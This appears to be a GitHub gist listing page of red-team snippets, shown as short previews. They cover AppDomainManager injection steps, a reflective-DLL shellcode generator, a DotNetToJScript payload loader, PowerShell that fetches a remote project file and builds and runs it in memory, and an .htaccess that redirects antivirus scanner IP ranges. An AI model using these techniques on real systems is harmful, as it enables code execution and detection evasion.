Skip to content

Instantly share code, notes, and snippets.

@leoloobeek
leoloobeek / main.go
Last active Sep 14, 2021
Quick 'n dirty script to match Amass results with in-scope networks
View main.go
package main
// go run main.go -amass amass.json -scope scope.txt
import (
"bufio"
"encoding/json"
"flag"
"fmt"
"net"
@leoloobeek
leoloobeek / _Instructions_Reproduce.md
Created Apr 29, 2020
GhostLoader - AppDomainManager - Injection - 攻壳机动队
View _Instructions_Reproduce.md

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
View ShellcodeRDI.go
package main
/*
*
* This is just a Go implementation of https://github.com/monoxgas/sRDI/
* Useful if you're trying to generate shellcode for reflective DLL
* injection in Go, otherwise probably not much use :)
*
* The project, shellcode, most comments within this project
* are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas)
@leoloobeek
leoloobeek / sysmon_lolbas_profiler.ps1
Created Jan 28, 2019
Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
View sysmon_lolbas_profiler.ps1
#https://github.com/LOLBAS-Project/LOLBAS
$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep
@leoloobeek
leoloobeek / JScriptToDotnet.js
Created Nov 28, 2018
Sample Extract Payload DotNetToJScript
View JScriptToDotnet.js
//Base64 Raw Decoder
function Base64Decode(str) {
if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string');
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var o1, o2, o3, h1, h2, h3, h4, bits, d=[];
for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets
View client.ps1
function Get-PublicKey
{
[OutputType([byte[]])]
PARAM (
[Uri]$Uri
)
if (-Not ($uri.Scheme -eq "https"))
{
Write-Error "You can only get keys for https addresses"
View Build_In_Memory_CSharp_Project.txt
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
- Launch program (payload)
View Build_In_Memory_CSharp_XSLT_Project.txt
In-memory PowerShell XSLT project build:
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.build();
View Numbers.Xml
<?xml version='1.0'?>
<data>
<circle>
<radius>12</radius>
</circle>
<circle>
<radius>37.5</radius>
</circle>
</data>
@leoloobeek
leoloobeek / .htaccess
Created Mar 1, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
#LogLevel alert rewrite:trace5
# BURN AV BURN
# ForcePoint
RewriteCond expr "-R '208.80.192.0/21'" [OR]
# AWS & Other VT hosts
RewriteCond expr "-R '54.0.0.0/8'" [OR]